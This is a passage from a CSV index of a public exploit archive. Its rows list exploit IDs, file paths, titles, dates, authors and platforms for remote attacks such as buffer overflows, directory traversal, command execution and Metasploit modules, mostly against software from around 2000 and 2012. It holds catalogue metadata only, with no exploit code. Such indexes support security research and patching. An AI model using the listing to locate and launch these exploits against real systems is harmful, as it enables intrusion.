Consulting",windows,remote, -19978,exploits/linux/remote/19978.pl,"Atrus Trivalie Productions Simple Network Time Sync 1.0 - daemon Buffer Overflow",2000-06-01,"Ben Taylor",linux,remote, -19983,exploits/linux/remote/19983.c,"NetWin DMail 2.7/2.8 - ETRN Buffer Overflow",2000-06-01,noir,linux,remote, -19995,exploits/cgi/remote/19995.txt,"Michael Lamont Savant Web Server 2.1 - CGI Source Code Disclosure",2000-06-05,Drew,cgi,remote, -19997,exploits/windows/remote/19997.java,"Etype Eserv 2.9.2 - Logging Buffer Overflow",2000-05-10,Wizdumb,windows,remote, -19998,exploits/linux/remote/19998.c,"ISC innd 2.x - Remote Buffer Overflow",2000-06-12,"Michal Zalewski",linux,remote, -20007,exploits/cgi/remote/20007.c,"3R Soft MailStudio 2000 2.0 - 'userreg.cgi' Arbitrary Command Execution",2000-04-24,fygrave,cgi,remote, -20008,exploits/cgi/remote/20008.txt,"3R Soft MailStudio 2000 2.0 - Arbitrary File Access",2000-06-09,s0ftpr0ject,cgi,remote, -20009,exploits/linux/remote/20009.py,"AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution",2012-07-21,muts,linux,remote, -20019,exploits/windows/remote/20019.txt,"Cart32 3.0 - 'expdate' Administrative Information Disclosure",2000-05-03,cassius,windows,remote, -20027,exploits/multiple/remote/20027.txt,"BEA Systems WebLogic Express 3.1.8/4/5 - Source Code Disclosure",2000-06-21,"Foundstone Inc.",multiple,remote, -20028,exploits/windows/remote/20028.rb,"Simple Web Server - Connection Header Buffer Overflow (Metasploit)",2012-07-23,Metasploit,windows,remote, -20030,exploits/unix/remote/20030.c,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1)",1999-10-15,tf8,unix,remote, -20031,exploits/linux/remote/20031.c,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2)",2000-09-26,vsz_,linux,remote, -20032,exploits/lin_x86/remote/20032.txt,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3)",2001-05-04,justme,lin_x86,remote, -20040,exploits/windows/remote/20040.c,"SapporoWorks WinProxy 2.0/2.0.1 - Remote Buffer Overflow",2000-06-27,UNYUN,windows,remote, -20041,exploits/cgi/remote/20041.txt,"Flowerfire Sawmill 5.0.21 - File Access",2000-06-26,"Larry W. Cashdollar",cgi,remote, -20043,exploits/linux/remote/20043.c,"DALnet Bahamut IRCd 4.6.5 - 'SUMMON' Remote Buffer Overflow",2000-06-29,"Matt Conover",linux,remote, -20046,exploits/unix/remote/20046.txt,"Netscape Professional Services FTP Server (LDAP Aware) 1.3.6 - FTP Server",2000-06-21,"Michael Zalewski",unix,remote, -20048,exploits/windows/remote/20048.txt,"Microsoft Windows Server 2000 - Remote CPU-overload",2000-06-30,"SecureXpert Labs",windows,remote, -20059,exploits/cgi/remote/20059.txt,"CGI-World Poll It 2.0 - Internal Variable Override",2000-07-04,"Adrian Daminato",cgi,remote, -20060,exploits/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - '/INVITE' Format String",2000-07-05,RaiSe,linux,remote, -20061,exploits/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow",2000-07-02,UNYUN,linux,remote, -20065,exploits/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 - File Existence Disclosure",2000-07-08,"Andrew Lewis",windows,remote, -20066,exploits/windows/remote/20066.java,"Michael Lamont Savant Web Server 2.1/3.0 - Remote Buffer Overflow",2000-07-03,Wizdumb,windows,remote, -20067,exploits/hardware/remote/20067.c,"PIX Firewall 2.7/3.x/4.x/5 - Forged TCP RST",2000-07-10,"Citec Network Securities",hardware,remote, -20068,exploits/cgi/remote/20068.txt,"Sean MacGuire Big Brother 1.x - Directory Traversal",2000-07-11,"Eric Hines",cgi,remote, -20070,exploits/windows/remote/20070.txt,"alt-n WorldClient standard 2.1 - Directory Traversal",2000-07-12,"Rikard Carlsson",windows,remote, -20074,exploits/windows/remote/20074.java,"Infopulse GateKeeper 3.5 - Remote Buffer Overflow",2000-07-13,Wizdumb,windows,remote, -20075,exploits/linux/remote/20075.c,"Conectiva 4.x/5.x / Debian 2.x / RedHat 6.x / S.u.S.E 6.x/7.0 / Trustix 1.x - rpc.statd Remote Format String (1)",2000-07-16,drow,linux,remote, -20076,exploits/linux/remote/20076.c,"Conectiva 4.x/5.x / Debian 2.x / RedHat 6.x / S.u.S.E 6.x/7.0 / Trustix 1.x - rpc.statd Remote Format String (2)",2000-08-01,Doing,linux,remote, -20077,exploits/linux/remote/20077.c,"Conectiva 4.x/5.x / Debian 2.x / RedHat 6.x / S.u.S.E 6.x/7.0 / Trustix 1.x - rpc.statd Remote Format String (3)",2000-08-03,ron1n,linux,remote, -20078,exploits/windows/remote/20078.pl,"Microsoft Outlook 97/98/2000 / Outlook Express 4.0/5.0 - GMT Field Buffer Overflow (1)",2000-07-18,"Ussr Labs",windows,remote, -20079,exploits/windows/remote/20079.txt,"Microsoft Outlook 97/98/2000 / Outlook Express 4.0/5.0 - GMT Field Buffer Overflow (2)",2000-07-18,"Ussr Labs",windows,remote, -20082,exploits/unix/remote/20082.txt,"University of Washington pop2d 4.46/4.51/4.54/4.55 - Remote File Read",2000-07-14,mandark,unix,remote, -20085,exploits/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 - Piped Command",2000-07-18,Prizm,cgi,remote, -20086,exploits/windows/remote/20086.c,"OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 - 'webfind.exe' Remote Buffer Overflow",2000-06-01,"Robert Horton",windows,remote, -20088,exploits/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 - 'pbcontrol.php' Root Remote Code Execution",2012-07-24,muts,linux,remote, -20089,exploits/windows/remote/20089.txt,"Microsoft IIS 4.0/5.0 - Source Fragment Disclosure",2000-07-17,"Zuo Lei",windows,remote, -20091,exploits/multiple/remote/20091.txt,"Stalker CommuniGate Pro 3.2.4 - Arbitrary File Read",2000-04-03,S21Sec,multiple,remote, -20095,exploits/multiple/remote/20095.txt,"Sun Java Web Server 1.1.3/2.0 Servlets - information Disclosure",2000-07-20,"kevin j",multiple,remote, -20096,exploits/windows/remote/20096.txt,"Microsoft IIS 2.0/3.0/4.0/5.0/5.1 - Internal IP Address Disclosure",2000-07-13,"Dougal Campbell",windows,remote, -20097,exploits/multiple/remote/20097.txt,"IBM Websphere Application Server 2.0./3.0/3.0.2.1 - Showcode",2000-07-24,"Shreeraj Shah",multiple,remote, -20103,exploits/windows/remote/20103.txt,"AnalogX SimpleServer:WWW 1.0.6 - Directory Traversal",2000-07-26,"Foundstone Inc.",windows,remote, -20104,exploits/multiple/remote/20104.txt,"Roxen WebServer 2.0.x - '%00' Request File/Directory Disclosure",2000-07-21,zorgon,multiple,remote, -20105,exploits/linux/remote/20105.txt,"Conectiva 4.x/5.x / RedHat 6.x - pam_console Remote User",2000-07-27,bkw1a,linux,remote, -20106,exploits/windows/remote/20106.cpp,"Microsoft Windows NT 4.0/2000 - NetBIOS Name Conflict",2000-08-01,"Sir Dystic",windows,remote, -20112,exploits/windows/remote/20112.rb,"Cisco Linksys PlayerPT - ActiveX Control Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,remote, -20113,exploits/linux/remote/20113.rb,"Symantec Web Gateway 5.0.2.18 - 'pbcontrol.php' Command Injection (Metasploit)",2012-07-27,Metasploit,linux,remote, -20301,exploits/windows/remote/20301.php,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (4)",2000-10-17,BoloTron,windows,remote, -20145,exploits/linux/remote/20145.c,"Aptis Software TotalBill 3.0 - Remote Command Execution",2000-08-08,"Brian Masney",linux,remote, -20125,exploits/windows/remote/20125.txt,"Weblogic 3.1.8/4.0.4/4.5.1 - Remote Command Execution",2000-08-01,"Foundstone Inc.",windows,remote, -20131,exploits/multiple/remote/20131.txt,"Apache Tomcat 3.1 - Path Revealing",2000-07-20,"ET LoWNOISE",multiple,remote, -20132,exploits/multiple/remote/20132.txt,"Tomcat 3.0/3.1 Snoop Servlet - Information Disclosure",2000-07-20,"ET LoWNOISE",multiple,remote, -20134,exploits/windows/remote/20134.pl,"NAI Net Tools PKI Server 1.0 - 'strong.exe' Remote Buffer Overflow",2000-08-02,juliano,windows,remote, -20135,exploits/windows/remote/20135.txt,"nai net tools pki server 1.0 - Directory Traversal",2000-08-02,"Juliano Rizzo",windows,remote, -20136,exploits/windows/remote/20136.txt,"NAI Net Tools PKI Server 1.0 - Format String",2000-08-02,"Juliano Rizzo",windows,remote, -20139,exploits/multiple/remote/20139.txt,"Sun JDK 1.1.x / Sun JRE 1.1.x - Listening Socket",2000-08-03,"Alexey Yarovinsky",multiple,remote, -20140,exploits/multiple/remote/20140.txt,"Netscape Communicator 4.x - URL Read",2000-08-03,"Dan Brumleve",multiple,remote, -20143,exploits/linux/remote/20143.txt,"Luca Deri ntop 1.2 a7-9 - Unauthorized File Retrieval",2000-08-02,dubhe,linux,remote, -20144,exploits/solaris/remote/20144.txt,"Sun AnswerBook2 1.4.2/1.4.3/1.4.4 - Administration Interface Access",2000-08-08,"Lluis Mora",solaris,remote, -20146,exploits/solaris/remote/20146.txt,"Solaris AnswerBook2 - Remote Command Execution",2000-08-07,"Lluis Mora",solaris,remote, -20148,exploits/windows/remote/20148.pl,"MediaHouse Software Statistics Server LiveStats 5.2 - Remote Buffer Overflow",2000-08-10,Zan,windows,remote, -20149,exploits/irix/remote/20149.c,"IRIX 5.2/5.3/6.x - TelnetD Environment Variable Format String",2000-07-01,"Last Stage of Delirium",irix,remote, -20150,exploits/unix/remote/20150.c,"Luca Deri ntop 1.2 a7-9/1.3.1 - Remote Buffer Overflow",2000-08-14,anonymous,unix,remote, -20151,exploits/windows/remote/20151.pl,"Microsoft IIS 5.0 - 'Translate: f' Source Disclosure (1)",2000-08-14,smiler,windows,remote, -20152,exploits/windows/remote/20152.pl,"Microsoft IIS 5.0 - 'Translate: f' Source Disclosure (2)",2000-08-14,"Roelof Temmingh",windows,remote, -20156,exploits/cgi/remote/20156.txt,"netwin netauth 4.2 - Directory Traversal",2000-08-17,"Marc Maiffret",cgi,remote, -20157,exploits/linux/remote/20157.c,"UMN Gopherd 2.x - Halidate Function Buffer Overflow",2000-08-20,"Chris Sharp",linux,remote, -20159,exploits/linux/remote/20159.c,"Darxite 0.4 - Login Buffer Overflow",2000-08-22,Scrippie,linux,remote, -20161,exploits/linux/remote/20161.txt,"X-Chat 1.2/1.3/1.4/1.5 - Command Execution via URLs",2000-08-17,"zenith parsec",linux,remote, -20163,exploits/unix/remote/20163.c,"WorldView 6.5/Wnn4 4.2 - Asian Language Server Remote Buffer Overflow",2000-03-08,UNYUN,unix,remote, -20164,exploits/cgi/remote/20164.pl,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote, -20165,exploits/cgi/remote/20165.html,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote, -20168,exploits/php/remote/20168.pl,"pBot - Remote Code Execution",2012-08-01,bwall,php,remote, -20174,exploits/windows/remote/20174.rb,"Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (MS12-037) (Metasploit)",2012-08-02,Metasploit,windows,remote, -20176,exploits/cgi/remote/20176.pl,"CGI Script Center Subscribe Me Lite 2.0 - Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote, -20177,exploits/cgi/remote/20177.html,"CGI Script Center Subscribe Me Lite 2.0 - Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote, -20180,exploits/windows/remote/20180.c,"RobTex Viking Server 1.0.6 Build 355 - Remote Buffer Overflow",2000-08-28,wildcoyote,windows,remote, -20181,exploits/multiple/remote/20181.txt,"Kerberos 4 4.0/5 5.0 - KDC Spoofing",2000-08-28,"Dug Song",multiple,remote, -20182,exploits/windows/remote/20182.txt,"Ipswitch IMail 6.x - File Attachment",2000-08-30,Timescape,windows,remote, -20183,exploits/cgi/remote/20183.pl,"GWScripts News Publisher 1.0 - 'author.file' Write",2000-08-29,n30,cgi,remote, -20184,exploits/windows/remote/20184.txt,"eEye Digital Security IRIS 1.0.1 / SpyNet CaptureNet 3.0.12 - Remote Buffer Overflow",2000-08-31,"Ussr Labs",windows,remote, -20194,exploits/cgi/remote/20194.pl,"CGI Script Center Auction Weaver 1.0.2 - Remote Command Execution",2000-08-30,teleh0r,cgi,remote, -20299,exploits/windows/remote/20299.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (2)",2000-10-21,"Roelof Temmingh",windows,remote, -20300,exploits/windows/remote/20300.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (3)",2000-10-17,zipo,windows,remote, -20202,exploits/windows/remote/20202.rb,"Cisco Linksys PlayerPT - ActiveX Control SetSource sURL argument Buffer Overflow (Metasploit)",2012-08-03,Metasploit,windows,remote, -20204,exploits/windows/remote/20204.rb,"Dell SonicWALL Scrutinizer 9 - SQL Injection (Metasploit)",2012-08-03,Metasploit,windows,remote, -20205,exploits/unix/remote/20205.rb,"Zenoss 3 - showDaemonXMLConfig Command Execution (Metasploit)",2012-08-03,Metasploit,unix,remote,8080 -20206,exploits/multiple/remote/20206.txt,"QSSL Voyager 2.0 1B - Arbitrary File Access",2000-09-01,neonbunny,multiple,remote, -20207,exploits/multiple/remote/20207.txt,"QSSL Voyager 2.0 1B - '.photon' Directory Information Disclosure",2000-09-01,neonbunny,multiple,remote, -20210,exploits/linux/remote/20210.txt,"Apache 1.3.12 - WebDAV Directory Listings",2000-09-07,Mnemonix,linux,remote, -20211,exploits/windows/remote/20211.c,"Mobius DocumentDirect for the Internet 1.2 - Remote Buffer Overflow",2000-09-08,wildcoyote,windows,remote, -20214,exploits/windows/remote/20214.pl,"Check Point Software Firewall-1 3.0/1 4.0 - Session Agent Impersonation",1998-09-24,"Andrew Danforth",windows,remote, -20215,exploits/multiple/remote/20215.pl,"Check Point Software Firewall-1 3.0/1 4.0/1 4.1 - Session Agent Dictionary Attack (1)",2000-08-15,"Nelson Brito",multiple,remote, -20216,exploits/multiple/remote/20216.sh,"Check Point Software Firewall-1 3.0/1 4.0/1 4.1 - Session Agent Dictionary Attack (2)",2000-10-01,"Gregory Duchemin",multiple,remote, -20218,exploits/cgi/remote/20218.txt,"YaBB 9.1.2000 - Arbitrary File Read",2000-09-10,pestilence,cgi,remote, -20220,exploits/linux/remote/20220.txt,"Mandrake 6.1/7.0/7.1 - '/perl' HTTP Directory Disclosure",2000-09-11,anonymous,linux,remote, -20222,exploits/windows/remote/20222.cpp,"Microsoft Windows Server 2000 - 'telnet.exe' NTLM Authentication",2000-08-14,@stake,windows,remote, -20223,exploits/windows/remote/20223.txt,"Sambar Server 4.3/4.4 Beta 3 - Search CGI",2000-09-15,dethy,windows,remote, -20224,exploits/windows/remote/20224.txt,"CamShot WebCam 2.6 Trial - Remote Buffer Overflow",2000-09-15,SecuriTeam,windows,remote, -20231,exploits/hardware/remote/20231.txt,"Cisco PIX Firewall 4.x/5.x - SMTP Content Filtering Evasion",2000-09-19,"Lincoln Yeoh",hardware,remote, -20234,exploits/multiple/remote/20234.txt,"extent technologies rbs isp 2.5 - Directory Traversal",2000-09-21,anon,multiple,remote,8002 -20235,exploits/windows/remote/20235.pl,"Cisco Secure ACS for Windows NT 2.42 - Remote Buffer Overflow",2000-09-21,blackangels,windows,remote, -20236,exploits/linux/remote/20236.txt,"SuSE Linux 6.3/6.4 - Installed Package Disclosure",2000-09-21,t0maszek,linux,remote, -20237,exploits/linux/remote/20237.c,"UoW Pine 4.0.4/4.10/4.21 - 'From:' Remote Buffer Overflow",2000-09-23,Arkane,linux,remote, -20238,exploits/cgi/remote/20238.txt,"Alabanza Control Panel 3.0 - Domain Modification",2000-09-24,"Weihan Leow",cgi,remote, -20240,exploits/windows/remote/20240.txt,"Microsoft Windows Media Player 7 - Embedded OCX Control",2000-09-26,"Ussr Labs",windows,remote, -20242,exploits/cgi/remote/20242.txt,"Unixware 7.0 - SCOhelp HTTP Server Format String",2000-09-26,"Juliano Rizzo",cgi,remote, -20243,exploits/windows/remote/20243.html,"Microsoft Windows Script Host 5.1/5.5 - 'GetObject()' File Disclosure",2000-09-26,"Georgi Guninski",windows,remote, -20244,exploits/cgi/remote/20244.txt,"TalentSoft Web+ Client/Monitor/server 4.6 - Internal IP Address Disclosure",2000-09-27,"Delphis Consulting",cgi,remote, -20245,exploits/cgi/remote/20245.txt,"TalentSoft Web+ Client/Monitor/server 4.6 - Source Code Disclosure",2000-09-27,"Delphis Consulting",cgi,remote, -20246,exploits/linux/remote/20246.txt,"TalentSoft Web+ Application Server (Linux) 4.6 - Example Script File Disclosure",2000-09-26,DCIST,linux,remote, -20247,exploits/windows/remote/20247.txt,"Smartwin Technology CyberOffice Shopping Cart 2.0 - Price Modification",2000-10-02,"Delphis Consulting",windows,remote, -20248,exploits/windows/remote/20248.txt,"SmartWin CyberOffice Shopping Cart 2.0 - Client Information Disclosure",2000-10-02,DCIST,windows,remote, -20249,exploits/windows/remote/20249.txt,"David Harris Pegasus Mail 3.12 - File Forwarding",2000-10-03,"Imran Ghory",windows,remote, -20253,exploits/linux/remote/20253.sh,"OpenSSH 1.2 - '.scp' File Create/Overwrite",2000-09-30,"Michal Zalewski",linux,remote, -20258,exploits/multiple/remote/20258.c,"HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (1)",1994-02-07,"Josh D",multiple,remote, -20259,exploits/multiple/remote/20259.txt,"HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (2)",1994-02-07,anonymous,multiple,remote, -20500,exploits/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload (Metasploit)",2012-08-15,Metasploit,php,remote, -20266,exploits/windows/remote/20266.txt,"Microsoft Virtual Machine 2000/3100/3200/3300 Series - 'com.ms.activeX.ActiveXComponent' Arbitrary Program Execution",2000-10-05,"Marcin Jackowski",windows,remote, -20298,exploits/windows/remote/20298.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (1)",2000-10-17,"Gabriel Maggiotti",windows,remote, -20269,exploits/windows/remote/20269.txt,"Microsoft IIS 5.0 - Indexed Directory Disclosure",2000-10-04,"David Litchfield",windows,remote, -20273,exploits/cgi/remote/20273.txt,"Moreover CGI script - File Disclosure",2000-10-02,CDI,cgi,remote, -20277,exploits/cgi/remote/20277.txt,"Armada Design Master Index 1.0 - Directory Traversal",2000-07-18,pestilence,cgi,remote, -20279,exploits/cgi/remote/20279.txt,"extropia webstore 1.0/2.0 - Directory Traversal",2000-10-09,f0bic,cgi,remote, -20280,exploits/cgi/remote/20280.txt,"Bytes interactive Web shopper 1.0/2.0 - Directory Traversal",2000-10-08,f0bic,cgi,remote, -20281,exploits/cgi/remote/20281.txt,"Hassan Consulting Shopping Cart 1.18 - Directory Traversal",2000-10-07,f0bic,cgi,remote, -20283,exploits/windows/remote/20283.txt,"Microsoft Windows 9x/ME - Share Level Password Bypass (1)",2000-10-10,stickler,windows,remote, -20284,exploits/windows/remote/20284.txt,"Microsoft Windows 9x/ME - Share Level Password Bypass (2)",2000-10-10,"Gabriel Maggiotti",windows,remote, -20286,exploits/php/remote/20286.c,"PHP 3.0/4.0 - Error Logging Format String",2000-10-12,anonymous,php,remote, -20287,exploits/windows/remote/20287.c,"Nevis Systems All-Mail 1.1 - Remote Buffer Overflow",2000-10-10,@stake,windows,remote, -20288,exploits/windows/remote/20288.c,"Microsoft Windows 9x - File Handle Buffer Overflow",2000-07-10,Nsfocus,windows,remote, -20292,exploits/freebsd/remote/20292.pl,"cURL 6.1 < 7.4 - Remote Buffer Overflow (1)",2000-10-13,zillion,freebsd,remote, -20293,exploits/linux/remote/20293.pl,"cURL 6.1 < 7.4 - Remote Buffer Overflow (2)",2000-10-13,zillion,linux,remote, -20297,exploits/windows/remote/20297.rb,"Oracle AutoVue - ActiveX Control SetMarkupMode Buffer Overflow (Metasploit)",2012-08-06,Metasploit,windows,remote, -20302,exploits/windows/remote/20302.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (5)",2000-10-17,"Andrea Spabam",windows,remote, -20303,exploits/cgi/remote/20303.pl,"Oatmeal Studios Mail File 1.10 - Arbitrary File Disclosure",2000-10-11,"Dirk Brockhausen",cgi,remote, -20305,exploits/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 - Arbitrary File Upload",1999-01-30,Mnemonix,windows,remote, -20306,exploits/windows/remote/20306.html,"Microsoft Virtual Machine - Arbitrary Java Codebase Execution",2000-10-18,"Georgi Guninski",windows,remote, -20308,exploits/linux/remote/20308.c,"Samba 1.9.19 - 'Password' Remote Buffer Overflow",1997-09-25,root@adm.kix-azz.org,linux,remote, -20309,exploits/windows/remote/20309.txt,"Microsoft IIS 3.0 - 'newdsn.exe' File Creation",1997-08-25,"Vytis Fedaravicius",windows,remote, -20313,exploits/multiple/remote/20313.txt,"Allaire JRun 3 - Directory Disclosure",2000-10-23,"Foundstone Labs",multiple,remote, -20314,exploits/multiple/remote/20314.txt,"Allaire JRun 2.3 - Arbitrary Code Execution",2000-10-23,"Foundstone Labs",multiple,remote, -20315,exploits/multiple/remote/20315.txt,"Allaire JRun 2.3 - File Source Code Disclosure",2000-10-23,"Foundstone Labs",multiple,remote, -20318,exploits/windows/remote/20318.txt,"Oracle Business Transaction Management Server 12.1.0.2.7 - FlashTunnelService WriteToFile Message Remote Code Execution",2012-08-07,rgod,windows,remote, -20319,exploits/windows/remote/20319.txt,"Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService - Remote File Deletion",2012-08-07,rgod,windows,remote, -20321,exploits/windows/remote/20321.rb,"Ubisoft uplay 2.0.3 - ActiveX Control Arbitrary Code Execution (Metasploit)",2012-08-08,Metasploit,windows,remote, -20322,exploits/multiple/remote/20322.html,"Sun HotJava Browser 3 - Arbitrary DOM Access",2000-10-25,"Georgi Guninski",multiple,remote, -20324,exploits/windows/remote/20324.txt,"iPlanet Certificate Management System 4.2 - Directory Traversal",2000-10-25,CORE-SDI,windows,remote, -20325,exploits/windows/remote/20325.txt,"Netscape Directory Server 4.12 - Directory Server Directory Traversal",2000-10-25,CORE-SDI,windows,remote, -20327,exploits/unix/remote/20327.txt,"GNU Ffingerd 1.19 - 'Username' Validity Disclosure",1999-08-23,"Eilon Gishri",unix,remote, -20330,exploits/hardware/remote/20330.pl,"Cisco Catalyst 3500 XL - Arbitrary Command Execution",2000-10-26,blackangels,hardware,remote, -20334,exploits/windows/remote/20334.java,"Cat Soft Serv-U FTP Server 2.5.x - Brute Force",2000-10-29,Craig,windows,remote, -20335,exploits/windows/remote/20335.txt,"Microsoft Indexing Service (Windows 2000/NT 4.0) - '.htw' Cross-Site Scripting",2000-10-28,"Georgi Guninski",windows,remote, -20337,exploits/unix/remote/20337.c,"tcpdump 3.4/3.5 - AFS ACL Packet Buffer Overflow",2001-01-02,Zhodiac,unix,remote, -20340,exploits/unix/remote/20340.c,"Samba 2.0.7 - SWAT Logging Failure",2000-11-01,dodeca-T,unix,remote, -20354,exploits/php/remote/20354.rb,"PHP IRC Bot pbot - 'eval()' Remote Code Execution (Metasploit)",2012-08-08,Metasploit,php,remote, -20355,exploits/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 - Default MySQL Credential (Metasploit)",2012-08-08,Metasploit,windows,remote, -20369,exploits/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 - PASV Mode FTP Internal Address Disclosure",2000-10-03,"Fabio Pietrosanti",hardware,remote, -20370,exploits/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution",2000-10-29,"Mark Stratman",cgi,remote, -20371,exploits/windows/remote/20371.txt,"Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal",1995-10-30,"Dan Shearer",windows,remote, -20372,exploits/hardware/remote/20372.pl,"Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote Username / Password Retrieval",2000-10-26,@stake,hardware,remote, -20374,exploits/unix/remote/20374.c,"ISC BIND 8.1 - Host Remote Buffer Overflow",2000-10-27,antirez,unix,remote, -20375,exploits/windows/remote/20375.txt,"Sun Java Web Server 1.1 Beta - Viewable .jhtml Source",1997-07-16,"Brian Krahmer",windows,remote, -20384,exploits/windows/remote/20384.txt,"Microsoft IIS 4.0/5.0 - Executable File Parsing",2000-11-06,Nsfocus,windows,remote, -20387,exploits/cgi/remote/20387.txt,"YaBB 9.11.2000 - 'search.pl' Arbitrary Command Execution",2000-11-07,rpc,cgi,remote, -20392,exploits/windows/remote/20392.rb,"NetDecision 4.2 - TFTP Writable Directory Traversal Execution (Metasploit)",2012-08-10,Metasploit,windows,remote, -20394,exploits/unix/remote/20394.c,"BNC 2.2.4/2.4.6/2.4.8 - IRC Proxy Buffer Overflow (1)",1998-12-26,duke,unix,remote, -20395,exploits/unix/remote/20395.c,"BNC 2.2.4/2.4.6/2.4.8 - IRC Proxy Buffer Overflow (2)",1998-12-26,"jamez & dumped",unix,remote, -20397,exploits/cgi/remote/20397.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - Full Path Disclosure",2000-11-10,sozni,cgi,remote, -20399,exploits/windows/remote/20399.html,"Microsoft Indexing Service (Windows 2000) - File Verification",2000-11-10,"Georgi Guninski",windows,remote, -20404,exploits/beos/remote/20404.txt,"Joe Kloss RobinHood 1.1 - Remote Buffer Overflow",2000-11-14,Vort-fu,beos,remote, -20405,exploits/cgi/remote/20405.pl,"DCForum 1-6 - Arbitrary File Disclosure",2000-11-14,steeLe,cgi,remote, -20406,exploits/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 - Memory Contents Disclosure",2000-11-16,CORE-SDI,multiple,remote, -20408,exploits/cgi/remote/20408.txt,"Markus Triska CGIForum 1.0 - 'thesection' Directory Traversal",2000-11-20,zorgon,cgi,remote, -20412,exploits/jsp/remote/20412.txt,"Unify eWave ServletExec 3 - .JSP Source Disclosure",2000-11-21,"Wojciech Woch",jsp,remote, -20413,exploits/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - 'bb-hist.sh?HISTFILE' File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote, -20414,exploits/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,unix,remote, -20424,exploits/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script (MS00-090)",2000-11-22,"Sandro Gauci",windows,remote, -20423,exploits/cgi/remote/20423.txt,"NCSA httpd-campas 1.2 - sample script",1997-07-15,"Francisco Torres",cgi,remote, -20425,exploits/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",multiple,remote, -20426,exploits/windows/remote/20426.html,"Microsoft Internet Explorer 5.5 - 'Index.dat' (MS00-055)",2000-11-23,"Georgi Guninski",windows,remote, -20427,exploits/windows/remote/20427.txt,"Microsoft Windows Media Player 7.0 - '.asx' Remote Buffer Overflow",2000-11-22,@stake,windows,remote, -20429,exploits/jsp/remote/20429.txt,"Caucho Technology Resin 1.2 - JSP Source Disclosure",2000-11-23,benjurry,jsp,remote, -20430,exploits/cgi/remote/20430.txt,"Info2www 1.0/1.1 - CGI Input Handling",1998-03-03,"Niall Smart",cgi,remote, -20433,exploits/cgi/remote/20433.txt,"CGI City CC Whois 1.0 - MetaCharacter",1999-11-09,"Cody T. - hhp",cgi,remote, -20434,exploits/cgi/remote/20434.txt,"Miva htmlscript 2.x - Directory Traversal",1998-01-26,"Dennis Moore",cgi,remote, -20435,exploits/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x / NCSA httpd 1.x - test-cgi Directory Listing",1996-04-01,@stake,cgi,remote, -20441,exploits/multiple/remote/20441.txt,"IBM Net.Data 7.0 - Full Path Disclosure",2000-11-29,"Chad Kalmes",multiple,remote, -20442,exploits/cgi/remote/20442.html,"Greg Matthews - 'Classifieds.cgi' 1.0 Hidden Variable",1998-12-15,anonymous,cgi,remote, -20444,exploits/cgi/remote/20444.txt,"Greg Matthews - 'Classifieds.cgi' 1.0 MetaCharacter",1998-12-15,anonymous,cgi,remote, -20445,exploits/windows/remote/20445.txt,"Microsoft IIS 1.0 / Netscape Server 1.0/1.12 / OReilly WebSite Professional 1.1b - '.cmd' / '.CMD' Remote Command Execution",1996-03-01,anonymous,windows,remote, -20446,exploits/cgi/remote/20446.txt,"WebCom datakommunikation Guestbook 0.1 - 'wguest.exe' Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote, -20447,exploits/cgi/remote/20447.txt,"WebCom datakommunikation Guestbook 0.1 - 'rguest.exe' Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote, -20448,exploits/cgi/remote/20448.txt,"Novell NetWare Web Server 2.x - convert.bas",1996-07-03,"TTT Group",cgi,remote, -20449,exploits/unix/remote/20449.txt,"GlimpseHTTP 1.0/2.0 / WebGlimpse 1.0 - Piped Command",1996-07-03,"Razvan Dragomirescu",unix,remote, -20450,exploits/multiple/remote/20450.txt,"Trlinux Postaci Webmail 1.1.3 - Password Disclosure",2000-11-30,"Michael R. Rudel",multiple,remote, -20459,exploits/windows/remote/20459.html,"Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Remote File 